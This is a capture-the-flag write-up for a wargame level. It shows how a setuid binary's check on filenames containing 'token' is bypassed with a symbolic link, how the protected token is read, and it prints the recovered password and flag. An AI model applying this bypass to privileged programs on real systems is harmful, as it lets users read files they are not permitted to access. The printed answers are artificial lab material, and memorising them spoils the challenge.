## Level 08

### First step

We can see we have 2 files:
- *level08* ->  an executable, after disassembling it using gdb we know it reads content from a file.
- *token* -> we assume contains the token we need.

```bash
-rwsr-s---+ 1 flag08 level08 8617 Mar  5  2016 level08
-rw-------  1 flag08 flag08    26 Mar  5  2016 token
```
We do not have any reading rights on the *token* file. So we guessed that's where that challenge is?  

### Second step

By running the following commands
```bash
$> strings level08
...
%s [file to read]
token
You may not access '%s'
...
```
```bash
$> ./level08 token
You may not access 'token'
```

```bash
$> echo test_1 > /tmp/test
$> ./level08 /tmp/test
test_1
```

```bash
gdb ./level08
  set disassembly-flavor intel
  disassemble main
  ...
   0x080485ad <+89>:	mov    eax,DWORD PTR [eax]
   0x080485af <+91>:	mov    DWORD PTR [esp+0x4],0x8048793
   0x080485b7 <+99>:	mov    DWORD PTR [esp],eax
   0x080485ba <+102>:	call   0x8048400 <strstr@plt>
   0x080485bf <+107>:	test   eax,eax
   0x080485c1 <+109>:	je     0x80485e9 <main+149>
   0x080485c3 <+111>:	mov    eax,DWORD PTR [esp+0x1c]
   0x080485c7 <+115>:	add    eax,0x4
   0x080485ca <+118>:	mov    edx,DWORD PTR [eax]
   0x080485cc <+120>:	mov    eax,0x8048799
   0x080485d1 <+125>:	mov    DWORD PTR [esp+0x4],edx
   0x080485d5 <+129>:	mov    DWORD PTR [esp],eax
   0x080485d8 <+132>:	call   0x8048420 <printf@plt>
   0x080485dd <+137>:	mov    DWORD PTR [esp],0x1
   0x080485e4 <+144>:	call   0x8048460 <exit@plt>
  ...
  printf "%s", 0x8048793
  token
```

We can guess that the program doesn't take as entry files including the word **token**.

### Third step  

What if we create a symbolic link so that we can refer to the *token* file with a different name?

```bash
$> ln -s ~/token /tmp/test
$> ./level08 /tmp/test
quif5eloekouj29ke0vouxean
```

Finally we can output the token value through the symbolic link.  

### Final step

Now we can not log to level09 using this token, we need to run *getflag*. But before that we have to unlock it using *flag08* command.

```bash
$> su flag08
Password: quif5eloekouj29ke0vouxean
Don't forget to launch getflag !
$> getflag
Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f
```
